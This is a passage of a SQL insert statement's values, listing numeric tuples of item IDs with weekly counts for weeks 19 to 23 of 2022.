3531,1,'202219',5),(4332,1,'202219',5),(4335,1,'202219',5),(4341,1,'202219',5),(4357,1,'202219',5),(4377,1,'202219',5),(4424,1,'202219',5),(4436,1,'202219',5),(4454,1,'202219',5),(4514,1,'202219',5),(4529,1,'202219',5),(4591,1,'202219',5),(4612,1,'202219',5),(4645,1,'202219',5),(470,1,'202219',6),(472,1,'202219',6),(473,1,'202219',6),(476,1,'202219',6),(479,1,'202219',6),(480,1,'202219',6),(481,1,'202219',6),(483,1,'202219',6),(484,1,'202219',6),(486,1,'202219',6),(570,1,'202219',6),(1709,1,'202219',6),(1728,1,'202219',6),(1766,1,'202219',6),(1768,1,'202219',6),(2252,1,'202219',6),(2296,1,'202219',6),(2558,1,'202219',6),(2964,1,'202219',6),(3006,1,'202219',6),(3066,1,'202219',6),(3079,1,'202219',6),(3107,1,'202219',6),(3109,1,'202219',6),(3267,1,'202219',6),(3430,1,'202219',6),(3489,1,'202219',6),(3541,1,'202219',6),(3724,1,'202219',6),(3749,1,'202219',6),(3771,1,'202219',6),(4326,1,'202219',6),(4373,1,'202219',6),(4428,1,'202219',6),(4432,1,'202219',6),(4440,1,'202219',6),(4542,1,'202219',6),(485,1,'202219',7),(488,1,'202219',7),(1724,1,'202219',7),(1726,1,'202219',7),(1734,1,'202219',7),(1772,1,'202219',7),(2775,1,'202219',7),(2993,1,'202219',7),(3041,1,'202219',7),(3045,1,'202219',7),(3102,1,'202219',7),(3226,1,'202219',7),(3253,1,'202219',7),(3313,1,'202219',7),(3316,1,'202219',7),(3727,1,'202219',7),(3731,1,'202219',7),(4301,1,'202219',7),(4323,1,'202219',7),(4363,1,'202219',7),(4546,1,'202219',7),(4551,1,'202219',7),(482,1,'202219',8),(1590,1,'202219',8),(1592,1,'202219',8),(1741,1,'202219',8),(1782,1,'202219',8),(2751,1,'202219',8),(2809,1,'202219',8),(2911,1,'202219',8),(3038,1,'202219',8),(3087,1,'202219',8),(3482,1,'202219',8),(3710,1,'202219',8),(3746,1,'202219',8),(3752,1,'202219',8),(3774,1,'202219',8),(4238,1,'202219',8),(4396,1,'202219',8),(4408,1,'202219',8),(4444,1,'202219',8),(4524,1,'202219',8),(4556,1,'202219',8),(4566,1,'202219',8),(4587,1,'202219',8),(4651,1,'202219',8),(335,1,'202219',9),(467,1,'202219',9),(1604,1,'202219',9),(1711,1,'202219',9),(2309,1,'202219',9),(2609,1,'202219',9),(2801,1,'202219',9),(4400,1,'202219',9),(4412,1,'202219',9),(4657,1,'202219',9),(4663,1,'202219',9),(87,1,'202219',10),(108,1,'202219',10),(477,1,'202219',10),(1612,1,'202219',10),(1707,1,'202219',10),(2769,1,'202219',10),(2813,1,'202219',10),(3104,1,'202219',10),(3479,1,'202219',10),(4420,1,'202219',10),(74,1,'202219',11),(1588,1,'202219',11),(2804,1,'202219',11),(3060,1,'202219',11),(3764,1,'202219',11),(4404,1,'202219',11),(4654,1,'202219',11),(1606,1,'202219',12),(1608,1,'202219',12),(1614,1,'202219',12),(2503,1,'202219',12),(4668,1,'202219',12),(471,1,'202219',13),(1584,1,'202219',13),(3072,1,'202219',13),(3742,1,'202219',13),(3781,1,'202219',13),(4448,1,'202219',13),(84,1,'202219',14),(2457,1,'202219',14),(3027,1,'202219',14),(3030,1,'202219',14),(4660,1,'202219',14),(2297,1,'202219',15),(1610,1,'202219',16),(3063,1,'202219',16),(3117,1,'202219',16),(3127,1,'202219',16),(4520,1,'202219',16),(4582,1,'202219',16),(4712,1,'202219',16),(76,1,'202219',17),(91,1,'202219',17),(3004,1,'202219',17),(4416,1,'202219',17),(4688,1,'202219',17),(1594,1,'202219',18),(3069,1,'202219',18),(4691,1,'202219',18),(4674,1,'202219',19),(4677,1,'202219',19),(4700,1,'202219',19),(89,1,'202219',20),(1596,1,'202219',20),(4685,1,'202219',20),(1598,1,'202219',21),(4457,1,'202219',21),(4694,1,'202219',21),(4697,1,'202219',21),(4709,1,'202219',21),(4681,1,'202219',22),(1600,1,'202219',23),(1602,1,'202219',23),(4703,1,'202219',23),(469,1,'202219',24),(1582,1,'202219',24),(4706,1,'202219',24),(72,1,'202219',26),(1544,1,'202219',26),(68,1,'202219',29),(1586,1,'202219',36),(2904,1,'202219',49),(80,1,'202219',68),(9,1,'202219',635),(468,1,'202220',1),(476,1,'202220',1),(478,1,'202220',1),(479,1,'202220',1),(480,1,'202220',1),(486,1,'202220',1),(487,1,'202220',1),(1584,1,'202220',1),(1699,1,'202220',1),(1713,1,'202220',1),(1715,1,'202220',1),(1720,1,'202220',1),(1724,1,'202220',1),(1726,1,'202220',1),(1732,1,'202220',1),(1734,1,'202220',1),(1737,1,'202220',1),(1739,1,'202220',1),(1743,1,'202220',1),(1751,1,'202220',1),(1776,1,'202220',1),(1782,1,'202220',1),(2063,1,'202220',1),(2148,1,'202220',1),(2150,1,'202220',1),(2156,1,'202220',1),(2248,1,'202220',1),(2748,1,'202220',1),(2993,1,'202220',1),(3097,1,'202220',1),(3109,1,'202220',1),(3240,1,'202220',1),(3243,1,'202220',1),(3263,1,'202220',1),(3265,1,'202220',1),(3267,1,'202220',1),(3273,1,'202220',1),(4377,1,'202220',1),(4387,1,'202220',1),(4432,1,'202220',1),(4546,1,'202220',1),(4556,1,'202220',1),(4612,1,'202220',1),(467,1,'202220',2),(473,1,'202220',2),(477,1,'202220',2),(483,1,'202220',2),(485,1,'202220',2),(1590,1,'202220',2),(1604,1,'202220',2),(1695,1,'202220',2),(1697,1,'202220',2),(1705,1,'202220',2),(1749,1,'202220',2),(1768,1,'202220',2),(1778,1,'202220',2),(1780,1,'202220',2),(2161,1,'202220',2),(2293,1,'202220',2),(2658,1,'202220',2),(2775,1,'202220',2),(2991,1,'202220',2),(3006,1,'202220',2),(3023,1,'202220',2),(3066,1,'202220',2),(3079,1,'202220',2),(3083,1,'202220',2),(3087,1,'202220',2),(3102,1,'202220',2),(3226,1,'202220',2),(3249,1,'202220',2),(3253,1,'202220',2),(3257,1,'202220',2),(3271,1,'202220',2),(3275,1,'202220',2),(3278,1,'202220',2),(3280,1,'202220',2),(3285,1,'202220',2),(3541,1,'202220',2),(4391,1,'202220',2),(4396,1,'202220',2),(4404,1,'202220',2),(4420,1,'202220',2),(4424,1,'202220',2),(4551,1,'202220',2),(4591,1,'202220',2),(4681,1,'202220',2),(470,1,'202220',3),(472,1,'202220',3),(474,1,'202220',3),(481,1,'202220',3),(484,1,'202220',3),(488,1,'202220',3),(1703,1,'202220',3),(1718,1,'202220',3),(1730,1,'202220',3),(1741,1,'202220',3),(1745,1,'202220',3),(2165,1,'202220',3),(2178,1,'202220',3),(2296,1,'202220',3),(2558,1,'202220',3),(2956,1,'202220',3),(2965,1,'202220',3),(2989,1,'202220',3),(3005,1,'202220',3),(3038,1,'202220',3),(3041,1,'202220',3),(3090,1,'202220',3),(3096,1,'202220',3),(3261,1,'202220',3),(3282,1,'202220',3),(3430,1,'202220',3),(3710,1,'202220',3),(3714,1,'202220',3),(3731,1,'202220',3),(3746,1,'202220',3),(4238,1,'202220',3),(4329,1,'202220',3),(4363,1,'202220',3),(4368,1,'202220',3),(4382,1,'202220',3),(4412,1,'202220',3),(4440,1,'202220',3),(4542,1,'202220',3),(4608,1,'202220',3),(4674,1,'202220',3),(4700,1,'202220',3),(74,1,'202220',4),(106,1,'202220',4),(110,1,'202220',4),(482,1,'202220',4),(1707,1,'202220',4),(1770,1,'202220',4),(1772,1,'202220',4),(1774,1,'202220',4),(2152,1,'202220',4),(2159,1,'202220',4),(2297,1,'202220',4),(2609,1,'202220',4),(2751,1,'202220',4),(2964,1,'202220',4),(3107,1,'202220',4),(3124,1,'202220',4),(3251,1,'202220',4),(3290,1,'202220',4),(3297,1,'202220',4),(3316,1,'202220',4),(3721,1,'202220',4),(3724,1,'202220',4),(3738,1,'202220',4),(3749,1,'202220',4),(3752,1,'202220',4),(3771,1,'202220',4),(3774,1,'202220',4),(4275,1,'202220',4),(4301,1,'202220',4),(4373,1,'202220',4),(4408,1,'202220',4),(4428,1,'202220',4),(4444,1,'202220',4),(4514,1,'202220',4),(4517,1,'202220',4),(4688,1,'202220',4),(1614,1,'202220',5),(1766,1,'202220',5),(3034,1,'202220',5),(3045,1,'202220',5),(3307,1,'202220',5),(3479,1,'202220',5),(3486,1,'202220',5),(3531,1,'202220',5),(3727,1,'202220',5),(3777,1,'202220',5),(4332,1,'202220',5),(4338,1,'202220',5),(4436,1,'202220',5),(4677,1,'202220',5),(471,1,'202220',6),(1596,1,'202220',6),(1598,1,'202220',6),(2769,1,'202220',6),(2801,1,'202220',6),(3438,1,'202220',6),(3498,1,'202220',6),(3534,1,'202220',6),(3735,1,'202220',6),(4323,1,'202220',6),(4341,1,'202220',6),(4691,1,'202220',6),(4694,1,'202220',6),(4706,1,'202220',6),(102,1,'202220',7),(570,1,'202220',7),(1592,1,'202220',7),(2154,1,'202220',7),(2617,1,'202220',7),(2804,1,'202220',7),(3027,1,'202220',7),(3072,1,'202220',7),(3489,1,'202220',7),(4335,1,'202220',7),(4582,1,'202220',7),(4685,1,'202220',7),(4697,1,'202220',7),(4703,1,'202220',7),(4709,1,'202220',7),(1588,1,'202220',8),(1728,1,'202220',8),(3004,1,'202220',8),(4326,1,'202220',8),(4448,1,'202220',8),(108,1,'202220',9),(1608,1,'202220',9),(1612,1,'202220',9),(2704,1,'202220',9),(2809,1,'202220',9),(2911,1,'202220',9),(3063,1,'202220',9),(3117,1,'202220',9),(3313,1,'202220',9),(3742,1,'202220',9),(4416,1,'202220',9),(4454,1,'202220',9),(4566,1,'202220',9),(4648,1,'202220',9),(4654,1,'202220',9),(4668,1,'202220',9),(4712,1,'202220',9),(1606,1,'202220',10),(1610,1,'202220',10),(1711,1,'202220',10),(3060,1,'202220',10),(4400,1,'202220',10),(4660,1,'202220',10),(4663,1,'202220',10),(2813,1,'202220',11),(3127,1,'202220',11),(4524,1,'202220',11),(4657,1,'202220',11),(87,1,'202220',12),(335,1,'202220',12),(1544,1,'202220',12),(2503,1,'202220',12),(3069,1,'202220',12),(4529,1,'202220',12),(4645,1,'202220',12),(4651,1,'202220',12),(84,1,'202220',13),(4457,1,'202220',13),(2457,1,'202220',14),(4520,1,'202220',14),(3030,1,'202220',17),(4722,1,'202220',17),(89,1,'202220',18),(2309,1,'202220',18),(68,1,'202220',19),(1600,1,'202220',19),(76,1,'202220',20),(1586,1,'202220',20),(3764,1,'202220',21),(3781,1,'202220',21),(91,1,'202220',23),(1602,1,'202220',23),(72,1,'202220',24),(1594,1,'202220',25),(469,1,'202220',27),(2904,1,'202220',30),(1582,1,'202220',32),(80,1,'202220',64),(9,1,'202220',1036),(476,1,'202221',1),(481,1,'202221',1),(483,1,'202221',1),(486,1,'202221',1),(1699,1,'202221',1),(1724,1,'202221',1),(1732,1,'202221',1),(1739,1,'202221',1),(1741,1,'202221',1),(1770,1,'202221',1),(1774,1,'202221',1),(1778,1,'202221',1),(2152,1,'202221',1),(2156,1,'202221',1),(2178,1,'202221',1),(2293,1,'202221',1),(2296,1,'202221',1),(2558,1,'202221',1),(2617,1,'202221',1),(2965,1,'202221',1),(2993,1,'202221',1),(3005,1,'202221',1),(3096,1,'202221',1),(3104,1,'202221',1),(3107,1,'202221',1),(3240,1,'202221',1),(3243,1,'202221',1),(3245,1,'202221',1),(3249,1,'202221',1),(3253,1,'202221',1),(3269,1,'202221',1),(3273,1,'202221',1),(3278,1,'202221',1),(4338,1,'202221',1),(4357,1,'202221',1),(4363,1,'202221',1),(4377,1,'202221',1),(4387,1,'202221',1),(4404,1,'202221',1),(4428,1,'202221',1),(4432,1,'202221',1),(4436,1,'202221',1),(4514,1,'202221',1),(4542,1,'202221',1),(4546,1,'202221',1),(4556,1,'202221',1),(4608,1,'202221',1),(4612,1,'202221',1),(473,1,'202221',2),(474,1,'202221',2),(478,1,'202221',2),(479,1,'202221',2),(480,1,'202221',2),(482,1,'202221',2),(488,1,'202221',2),(1711,1,'202221',2),(1715,1,'202221',2),(1720,1,'202221',2),(1726,1,'202221',2),(1734,1,'202221',2),(1743,1,'202221',2),(1747,1,'202221',2),(1749,1,'202221',2),(1751,1,'202221',2),(1772,1,'202221',2),(1780,1,'202221',2),(1782,1,'202221',2),(2063,1,'202221',2),(2165,1,'202221',2),(2248,1,'202221',2),(2252,1,'202221',2),(2609,1,'202221',2),(2658,1,'202221',2),(2704,1,'202221',2),(2775,1,'202221',2),(2964,1,'202221',2),(2991,1,'202221',2),(3006,1,'202221',2),(3023,1,'202221',2),(3060,1,'202221',2),(3079,1,'202221',2),(3083,1,'202221',2),(3087,1,'202221',2),(3092,1,'202221',2),(3097,1,'202221',2),(3229,1,'202221',2),(3247,1,'202221',2),(3257,1,'202221',2),(3265,1,'202221',2),(3267,1,'202221',2),(3275,1,'202221',2),(3280,1,'202221',2),(3287,1,'202221',2),(3297,1,'202221',2),(3307,1,'202221',2),(3727,1,'202221',2),(3731,1,'202221',2),(3738,1,'202221',2),(4332,1,'202221',2),(4373,1,'202221',2),(4382,1,'202221',2),(4396,1,'202221',2),(4420,1,'202221',2),(4424,1,'202221',2),(4440,1,'202221',2),(4444,1,'202221',2),(4448,1,'202221',2),(4591,1,'202221',2),(4677,1,'202221',2),(4697,1,'202221',2),(102,1,'202221',3),(110,1,'202221',3),(467,1,'202221',3),(469,1,'202221',3),(472,1,'202221',3),(484,1,'202221',3),(485,1,'202221',3),(1544,1,'202221',3),(1584,1,'202221',3),(1590,1,'202221',3),(1695,1,'202221',3),(1703,1,'202221',3),(1705,1,'202221',3),(1707,1,'202221',3),(1709,1,'202221',3),(1737,1,'202221',3),(1745,1,'202221',3),(1776,1,'202221',3),(2148,1,'202221',3),(2150,1,'202221',3),(2161,1,'202221',3),(2297,1,'202221',3),(2748,1,'202221',3),(2751,1,'202221',3),(2956,1,'202221',3),(2989,1,'202221',3),(3034,1,'202221',3),(3041,1,'202221',3),(3102,1,'202221',3),(3109,1,'202221',3),(3226,1,'202221',3),(3251,1,'202221',3),(3261,1,'202221',3),(3263,1,'202221',3),(3282,1,'202221',3),(3316,1,'202221',3),(3438,1,'202221',3),(3498,1,'202221',3),(3531,1,'202221',3),(3541,1,'202221',3),(3724,1,'202221',3),(3735,1,'202221',3),(3746,1,'202221',3),(3749,1,'202221',3),(3752,1,'202221',3),(3771,1,'202221',3),(4275,1,'202221',3),(4368,1,'202221',3),(4391,1,'202221',3),(4457,1,'202221',3),(4648,1,'202221',3),(4685,1,'202221',3),(468,1,'202221',4),(470,1,'202221',4),(471,1,'202221',4),(477,1,'202221',4),(487,1,'202221',4),(570,1,'202221',4),(1592,1,'202221',4),(1697,1,'202221',4),(1713,1,'202221',4),(1718,1,'202221',4),(1722,1,'202221',4),(1728,1,'202221',4),(1730,1,'202221',4),(1766,1,'202221',4),(2309,1,'202221',4),(2769,1,'202221',4),(2801,1,'202221',4),(2813,1,'202221',4),(3259,1,'202221',4),(3271,1,'202221',4),(3430,1,'202221',4),(3482,1,'202221',4),(3714,1,'202221',4),(3721,1,'202221',4),(3774,1,'202221',4),(4329,1,'202221',4),(4408,1,'202221',4),(4517,1,'202221',4),(4524,1,'202221',4),(4587,1,'202221',4),(4668,1,'202221',4),(4674,1,'202221',4),(4681,1,'202221',4),(4691,1,'202221',4),(4694,1,'202221',4),(1604,1,'202221',5),(1612,1,'202221',5),(1701,1,'202221',5),(2154,1,'202221',5),(2911,1,'202221',5),(3004,1,'202221',5),(3038,1,'202221',5),(3045,1,'202221',5),(3285,1,'202221',5),(3479,1,'202221',5),(3486,1,'202221',5),(3710,1,'202221',5),(3777,1,'202221',5),(4301,1,'202221',5),(4323,1,'202221',5),(4341,1,'202221',5),(4412,1,'202221',5),(4454,1,'202221',5),(4551,1,'202221',5),(4703,1,'202221',5),(1768,1,'202221',6),(3072,1,'202221',6),(3090,1,'202221',6),(3124,1,'202221',6),(74,1,'202221',7),(108,1,'202221',7),(1588,1,'202221',7),(1600,1,'202221',7),(1614,1,'202221',7),(2804,1,'202221',7),(3290,1,'202221',7),(3489,1,'202221',7),(4238,1,'202221',7),(4326,1,'202221',7),(4688,1,'202221',7),(4700,1,'202221',7),(1610,1,'202221',8),(2457,1,'202221',8),(3066,1,'202221',8),(3534,1,'202221',8),(4335,1,'202221',8),(4416,1,'202221',8),(4566,1,'202221',8),(335,1,'202221',9),(1594,1,'202221',9),(2809,1,'202221',9),(3313,1,'202221',9),(4660,1,'202221',9),(4663,1,'202221',9),(1606,1,'202221',10),(2159,1,'202221',10),(2503,1,'202221',10),(3027,1,'202221',10),(3063,1,'202221',10),(3127,1,'202221',10),(3742,1,'202221',10),(3764,1,'202221',10),(4400,1,'202221',10),(4529,1,'202221',10),(4582,1,'202221',10),(4654,1,'202221',10),(4709,1,'202221',10),(4712,1,'202221',10),(1596,1,'202221',11),(1598,1,'202221',11),(1608,1,'202221',11),(3117,1,'202221',11),(4651,1,'202221',11),(4706,1,'202221',11),(3069,1,'202221',12),(4645,1,'202221',12),(4657,1,'202221',12),(84,1,'202221',13),(1586,1,'202221',13),(1602,1,'202221',13),(76,1,'202221',15),(3030,1,'202221',15),(3781,1,'202221',15),(4520,1,'202221',15),(89,1,'202221',16),(87,1,'202221',17),(2904,1,'202221',19),(91,1,'202221',20),(1582,1,'202221',20),(4722,1,'202221',20),(68,1,'202221',22),(72,1,'202221',29),(80,1,'202221',83),(9,1,'202221',1248),(106,1,'202222',1),(481,1,'202222',1),(1695,1,'202222',1),(1703,1,'202222',1),(1718,1,'202222',1),(1730,1,'202222',1),(1732,1,'202222',1),(1737,1,'202222',1),(1745,1,'202222',1),(1780,1,'202222',1),(2161,1,'202222',1),(2252,1,'202222',1),(2704,1,'202222',1),(2965,1,'202222',1),(3096,1,'202222',1),(3097,1,'202222',1),(3109,1,'202222',1),(3226,1,'202222',1),(3229,1,'202222',1),(3243,1,'202222',1),(3273,1,'202222',1),(3285,1,'202222',1),(3297,1,'202222',1),(3534,1,'202222',1),(3721,1,'202222',1),(3727,1,'202222',1),(3777,1,'202222',1),(4341,1,'202222',1),(4357,1,'202222',1),(4373,1,'202222',1),(4391,1,'202222',1),(4404,1,'202222',1),(4428,1,'202222',1),(4440,1,'202222',1),(4514,1,'202222',1),(4556,1,'202222',1),(4681,1,'202222',1),(4712,1,'202222',1),(471,1,'202222',2),(483,1,'202222',2),(488,1,'202222',2),(1590,1,'202222',2),(1726,1,'202222',2),(1734,1,'202222',2),(1739,1,'202222',2),(1741,1,'202222',2),(1751,1,'202222',2),(1770,1,'202222',2),(1774,1,'202222',2),(2063,1,'202222',2),(2558,1,'202222',2),(3005,1,'202222',2),(3034,1,'202222',2),(3038,1,'202222',2),(3041,1,'202222',2),(3079,1,'202222',2),(3087,1,'202222',2),(3102,1,'202222',2),(3107,1,'202222',2),(3247,1,'202222',2),(3249,1,'202222',2),(3259,1,'202222',2),(3269,1,'202222',2),(3282,1,'202222',2),(3482,1,'202222',2),(3486,1,'202222',2),(3531,1,'202222',2),(3541,1,'202222',2),(3738,1,'202222',2),(3746,1,'202222',2),(3774,1,'202222',2),(4332,1,'202222',2),(4363,1,'202222',2),(4387,1,'202222',2),(4432,1,'202222',2),(4448,1,'202222',2),(4454,1,'202222',2),(4517,1,'202222',2),(4566,1,'202222',2),(4688,1,'202222',2),(74,1,'202222',3),(468,1,'202222',3),(478,1,'202222',3),(479,1,'202222',3),(482,1,'202222',3),(484,1,'202222',3),(485,1,'202222',3),(487,1,'202222',3),(1701,1,'202222',3),(1705,1,'202222',3),(1709,1,'202222',3),(1715,1,'202222',3),(1720,1,'202222',3),(1743,1,'202222',3),(1776,1,'202222',3),(1778,1,'202222',3),(1782,1,'202222',3),(2156,1,'202222',3),(2293,1,'202222',3),(2658,1,'202222',3),(2748,1,'202222',3),(2751,1,'202222',3),(2801,1,'202222',3),(2964,1,'202222',3),(2989,1,'202222',3),(2993,1,'202222',3),(3240,1,'202222',3),(3245,1,'202222',3),(3253,1,'202222',3),(3257,1,'202222',3),(3261,1,'202222',3),(3263,1,'202222',3),(3265,1,'202222',3),(3271,1,'202222',3),(3278,1,'202222',3),(3287,1,'202222',3),(3316,1,'202222',3),(3731,1,'202222',3),(3735,1,'202222',3),(4301,1,'202222',3),(4329,1,'202222',3),(4377,1,'202222',3),(4396,1,'202222',3),(4542,1,'202222',3),(4546,1,'202222',3),(4648,1,'202222',3),(4685,1,'202222',3),(4697,1,'202222',3),(102,1,'202222',4),(110,1,'202222',4),(467,1,'202222',4),(470,1,'202222',4),(474,1,'202222',4),(480,1,'202222',4),(486,1,'202222',4),(1584,1,'202222',4),(1612,1,'202222',4),(1711,1,'202222',4),(1713,1,'202222',4),(1722,1,'202222',4),(1747,1,'202222',4),(1749,1,'202222',4),(2152,1,'202222',4),(2154,1,'202222',4),(2165,1,'202222',4),(2178,1,'202222',4),(2296,1,'202222',4),(2609,1,'202222',4),(2775,1,'202222',4),(2813,1,'202222',4),(2911,1,'202222',4),(3006,1,'202222',4),(3275,1,'202222',4),(3280,1,'202222',4),(3479,1,'202222',4),(3498,1,'202222',4),(3710,1,'202222',4),(4335,1,'202222',4),(4338,1,'202222',4),(4408,1,'202222',4),(4424,1,'202222',4),(4444,1,'202222',4),(4551,1,'202222',4),(4587,1,'202222',4),(4591,1,'202222',4),(4668,1,'202222',4),(4674,1,'202222',4),(4722,1,'202222',4),(1697,1,'202222',5),(1707,1,'202222',5),(1728,1,'202222',5),(1768,1,'202222',5),(1772,1,'202222',5),(2150,1,'202222',5),(2248,1,'202222',5),(3023,1,'202222',5),(3090,1,'202222',5),(3092,1,'202222',5),(3124,1,'202222',5),(3251,1,'202222',5),(3267,1,'202222',5),(3724,1,'202222',5),(3749,1,'202222',5),(4323,1,'202222',5),(4416,1,'202222',5),(4524,1,'202222',5),(476,1,'202222',6),(1544,1,'202222',6),(1596,1,'202222',6),(1604,1,'202222',6),(1699,1,'202222',6),(1766,1,'202222',6),(2148,1,'202222',6),(2956,1,'202222',6),(3069,1,'202222',6),(3072,1,'202222',6),(3083,1,'202222',6),(3290,1,'202222',6),(3438,1,'202222',6),(3752,1,'202222',6),(4238,1,'202222',6),(4412,1,'202222',6),(4651,1,'202222',6),(4677,1,'202222',6),(4703,1,'202222',6),(87,1,'202222',7),(335,1,'202222',7),(473,1,'202222',7),(1588,1,'202222',7),(1606,1,'202222',7),(1724,1,'202222',7),(2769,1,'202222',7),(2991,1,'202222',7),(3004,1,'202222',7),(3027,1,'202222',7),(3045,1,'202222',7),(3117,1,'202222',7),(3307,1,'202222',7),(3430,1,'202222',7),(3771,1,'202222',7),(4608,1,'202222',7),(4645,1,'202222',7),(4694,1,'202222',7),(472,1,'202222',8),(1592,1,'202222',8),(2457,1,'202222',8),(2503,1,'202222',8),(2617,1,'202222',8),(4326,1,'202222',8),(4400,1,'202222',8),(4420,1,'202222',8),(4700,1,'202222',8),(570,1,'202222',9),(1614,1,'202222',9),(2159,1,'202222',9),(2309,1,'202222',9),(3060,1,'202222',9),(3063,1,'202222',9),(3066,1,'202222',9),(3127,1,'202222',9),(3489,1,'202222',9),(3742,1,'202222',9),(4436,1,'202222',9),(76,1,'202222',10),(477,1,'202222',10),(1602,1,'202222',10),(2809,1,'202222',10),(3313,1,'202222',10),(4582,1,'202222',10),(4691,1,'202222',10),(4706,1,'202222',10),(4709,1,'202222',10),(84,1,'202222',11),(89,1,'202222',11),(108,1,'202222',11),(1600,1,'202222',11),(1610,1,'202222',11),(2297,1,'202222',11),(3030,1,'202222',11),(4654,1,'202222',11),(4660,1,'202222',11),(4663,1,'202222',11),(1608,1,'202222',12),(3781,1,'202222',12),(4520,1,'202222',12),(4657,1,'202222',12),(2804,1,'202222',13),(3764,1,'202222',13),(4529,1,'202222',13),(4612,1,'202222',13),(1594,1,'202222',14),(469,1,'202222',15),(1598,1,'202222',15),(4457,1,'202222',16),(91,1,'202222',17),(1582,1,'202222',19),(1586,1,'202222',22),(2904,1,'202222',29),(68,1,'202222',31),(72,1,'202222',37),(80,1,'202222',68),(9,1,'202222',609),(106,1,'202223',1),(110,1,'202223',1),(1713,1,'202223',2),(1749,1,'202223',2),(1699,1,'202223',3),(1720,1,'202223',3),(1726,1,'202223',3),(1778,1,'202223',3),(2063,1,'202223',3),(2156,1,'202223',3),(2293,1,'202223',3),(2993,1,'202223',3),(3240,1,'202223',3),(3269,1,'202223',3),(3271,1,'202223',3),(3273,1,'202223',3),(4357,1,'202223',3),(4363,1,'202223',3),(4648,1,'202223',3),(1711,1,'202223',4),(1734,1,'202223',4),(1737,1,'202223',4),(1741,1,'202223',4),(1743,1,'202223',4),(1768,1,'202223',4),(1772,1,'202223',4),(1782,1,'202223',4),(2148,1,'202223',4),(2956,1,'202223',4),(3092,1,'202223',4),(3229,1,'202223',4),(3243,1,'202223',4),(3245,1,'202223',4),(3249,1,'202223',4),(3257,1,'202223',4),(3259,1,'202223',4),(4329,1,'202223',4),(4368,1,'202223',4),(4382,1,'202223',4),(4551,1,'202223',4),(479,1,'202223',5),(1697,1,'202223',5),(1701,1,'202223',5),(1705,1,'202223',5),(1707,1,'202223',5),(1709,1,'202223',5),(1730,1,'202223',5),(1732,1,'202223',5),(1739,1,'202223',5),(1745,1,'202223',5),(1747,1,'202223',5),(1751,1,'202223',5),(2152,1,'202223',5),(2161,1,'202223',5),(2252,1,'202223',5),(2658,1,'202223',5),(3251,1,'202223',5),(3253,1,'202223',5),(3263,1,'202223',5),(3265,1,'202223',5),(3430,1,'202223',5),(3541,1,'202223',5),(3724,1,'202223',5),(3735,1,'202223',5),(3752,1,'202223',5),(4238,1,'202223',5),(4566,1,'202223',5),(481,1,'202223',6),(482,1,'202223',6),(484,1,'202223',6),(487,1,'202223',6),(1695,1,'202223',6),(1715,1,'202223',6),(1722,1,'202223',6),(1724,1,'202223',6),(2154,1,'202223',6),(2248,1,'202223',6),(2296,1,'202223',6),(2558,1,'202223',6),(2813,1,'202223',6),(3006,1,'202223',6),(3045,1,'202223',6),(3060,1,'202223',6),(3079,1,'202223',6),(3097,1,'202223',6),(3107,1,'202223',6),(3124,1,'202223',6),(3247,1,'202223',6),(3261,1,'202223',6),(3275,1,'202223',6),(3282,1,'202223',6),(3290,1,'202223',6),(3438,1,'202223',6),(3489,1,'202223',6),(3534,1,'202223',6),(3777,1,'202223',6),(4275,1,'202223',6),(4377,1,'202223',6),(4391,1,'202223',6),(4408,1,'202223',6),(4416,1,'202223',6),(4428,1,'202223',6),(4514,1,'202223',6),(4517,1,'202223',6),(4556,1,'202223',6),(4608,1,'202223',6),(4612,1,'202223',6),(480,1,'202223',7),(483,1,'202223',7),(1774,1,'202223',7),(1776,1,'202223',7),(2150,1,'202223',7),(2178,1,'202223',7),(2457,1,'202223',7),(2964,1,'202223',7),(2965,1,'202223',7),(2989,1,'202223',7),(3034,1,'202223',7),(3096,1,'202223',7),(3104,1,'202223',7),(3109,1,'202223',7),(3278,1,'202223',7),(3287,1,'202223',7),(3482,1,'202223',7),(3727,1,'202223',7),(3746,1,'202223',7),(3749,1,'202223',7),(4301,1,'202223',7),(4323,1,'202223',7),(4341,1,'202223',7),(4373,1,'202223',7),(4396,1,'202223',7),(4436,1,'202223',7),(4440,1,'202223',7),(4444,1,'202223',7),(4448,1,'202223',7),(4454,1,'202223',7),(467,1,'202223',8),(468,1,'202223',8),(470,1,'202223',8),(473,1,'202223',8),(474,1,'202223',8),(476,1,'202223',8),(485,1,'202223',8),(488,1,'202223',8),(1590,1,'202223',8),(1592,1,'202223',8),(1728,1,'202223',8),(2297,1,'202223',8),(2751,1,'202223',8),(3004,1,'202223',8),(3023,1,'202223',8),(3038,1,'202223',8),(3041,1,'202223',8),(3087,1,'202223',8),(3267,1,'202223',8),(3307,1,'202223',8),(3498,1,'202223',8),(3731,1,'202223',8),(3771,1,'202223',8),(3774,1,'202223',8),(4335,1,'202223',8),(4387,1,'202223',8),(4524,1,'202223',8),(4546,1,'202223',8),(4668,1,'202223',8),(4681,1,'202223',8),(4691,1,'202223',8),(74,1,'202223',9),(102,1,'202223',9),(478,1,'202223',9),(570,1,'202223',9),(1780,1,'202223',9),(2159,1,'202223',9),(2704,1,'202223',9),(2911,1,'202223',9),(2991,1,'202223',9),(3072,1,'202223',9),(3102,1,'202223',9),(3226,1,'202223',9),(3280,1,'202223',9),(3297,1,'202223',9),(3486,1,'202223',9),(3531,1,'202223',9),(3710,1,'202223',9),(3714,1,'202223',9),(4332,1,'202223',9),(4542,1,'202223',9),(4587,1,'202223',9),(4591,1,'202223',9),(486,1,'202223',10),(1718,1,'202223',10),(1766,1,'202223',10),(2748,1,'202223',10),(2775,1,'202223',10),(3090,1,'202223',10),(3285,1,'202223',10),(3738,1,'202223',10),(4404,1,'202223',10),(4424,1,'202223',10),(4432,1,'202223',10),(471,1,'202223',11),(1584,1,'202223',11),(1606,1,'202223',11),(1608,1,'202223',11),(1612,1,'202223',11),(1770,1,'202223',11),(2617,1,'202223',11),(2801,1,'202223',11),(3005,1,'202223',11),(3066,1,'202223',11),(3083,1,'202223',11),(3721,1,'202223',11),(4338,1,'202223',11),(4712,1,'202223',11),(4722,1,'202223',11),(469,1,'202223',12),(2165,1,'202223',12),(4412,1,'202223',12),(4685,1,'202223',12),(4700,1,'202223',12),(472,1,'202223',13),(477,1,'202223',13),(1596,1,'202223',13),(1604,1,'202223',13),(1703,1,'202223',13),(2309,1,'202223',13),(2769,1,'202223',13),(3127,1,'202223',13),(3313,1,'202223',13),(3316,1,'202223',13),(3479,1,'202223',13),(4420,1,'202223',13),(4645,1,'202223',13),(4663,1,'202223',13),(4688,1,'202223',13),(1614,1,'202223',14),(3027,1,'202223',14),(3742,1,'202223',14),(4520,1,'202223',14),(4529,1,'202223',14),(4651,1,'202223',14),(4677,1,'2022